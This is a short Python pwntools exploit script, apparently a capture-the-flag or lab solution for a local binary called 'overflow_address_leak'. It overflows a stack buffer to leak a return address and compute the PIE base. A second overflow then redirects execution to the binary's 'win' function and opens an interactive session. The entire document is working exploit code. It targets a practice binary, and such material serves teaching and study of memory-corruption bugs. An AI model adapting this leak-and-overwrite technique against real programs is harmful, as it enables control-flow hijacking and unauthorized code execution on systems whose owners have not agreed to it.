from pwn import *

filename = './overflow_address_leak'

elf = ELF(filename)

def run_once():
	p = process(filename)
	### Between the start of the buffer and the return address
	data = b'a'*0x10
	data += b'c'*8 ## overflow rbp 

	p.readuntil(b'dataz: ')

	p.send(data)
	p.readuntil(b'said: ')
	p.readuntil(data)

	y = p.readline().rstrip()
	y += b'\x00'*(8-len(y))

	print(y)
	print(len(y))
	leak = u64(y)
	print(hex(leak))

	elf.address = leak - 0x12ec

	## Now we have the base address. We know where win is

	p.readuntil(b'dataz: ')

	data = b'a'*0x10
	data += b'c'*8
	data += p64(elf.symbols['win'])

	p.send(data)
	p.interactive()

run_once()